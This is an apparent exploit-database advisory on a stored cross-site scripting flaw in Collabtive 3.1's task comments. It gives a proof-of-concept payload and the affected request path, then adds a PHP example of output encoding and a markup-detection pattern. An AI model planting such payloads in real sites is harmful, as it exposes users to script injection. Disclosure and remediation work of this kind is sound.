####################################################################

# Exploit Title : Collabtive 3.1 XSS Vulnerability
# Author [ Discovered By ] : Expertt
# Team : Cyber-Warrior.org Bug Researchers Group
# Date : 17/01/2019
# Vendor Homepage : https://webcollab.sourceforge.io/
# Software Download Link : https://sourceforge.net/projects/collabtive/files/collabtive/
# Affected Versions : 3.1
# Tested On : Wampp, Windows, Lampp
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
# Software Description : Collabtive is web based collaboration software.
# It is an Open Source alternative for proprietary tools like Active Collab or Basecamp.
# Features include: Projects, Instant Messenger, Tasks, Files, Timetracking, Multilanguage, Basecamp import

####################################################################

# Impact :
*********

* The affected web application is Collabtive, version 3.1.
* In the "Add a new task" section, after a task is added, the XSS payload is written and saved in the comment section.
* When the task list is then reorganized, a pop-up window is displayed, showing the XSS vulnerability.
* The screenshot linked below is the proof.
* https://i.hizliresim.com/5aLvL5.png

####################################################################

# PoC :
****************************
* XSS Code : <div/onmouseover='alert(1)'> style=x:>
* Post Request : target.com/[PATH]/managetasklist.php?action=showtasklist&id=3&tlid=17

####################################################################
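
The behaviour above (saved comment text later rendered into the task list page as markup) is closed by encoding the text at output time. The block below is an added example, not code from the advisory or from Collabtive: the helper names and sample rows are assumptions, and it also flags already-saved text that contains markup so it can be reviewed once the fix is deployed.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helper names, not Collabtive's own code.

/** Encode untrusted task/comment text for an HTML element body or a quoted attribute. */
function escape_html(string $text): string
{
    // ENT_QUOTES encodes both ' and "; ENT_SUBSTITUTE replaces invalid UTF-8
    // sequences instead of returning an empty string.
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Flag stored text that already contains markup, for review after the fix. */
function looks_like_markup(string $text): bool
{
    // A tag opener (<div, </p, <!--) or an inline event-handler attribute (onmouseover=).
    return preg_match('/<\/?[a-z!]|\bon[a-z]+\s*=/i', $text) === 1;
}

// Constructed sample rows standing in for saved task comments.
$rows = [
    ['id' => 1, 'text' => 'Call the vendor about invoice #42'],
    ['id' => 2, 'text' => "<div/onmouseover='alert(1)'> style=x:>"], // string from the PoC
    ['id' => 3, 'text' => 'Budget < forecast & rising'],             // benign "<" and "&"
];

foreach ($rows as $row) {
    $flag = looks_like_markup($row['text']) ? 'REVIEW' : 'ok';
    // Every row is encoded on output, whether or not it was flagged:
    // the flag is for cleanup, the encoding is the actual fix.
    printf("%d [%s] %s\n", $row['id'], $flag, escape_html($row['text']));
}
```

Encoding belongs at the point where the value is written into HTML; the markup check is only a triage aid for existing records and is not a filter to rely on for input.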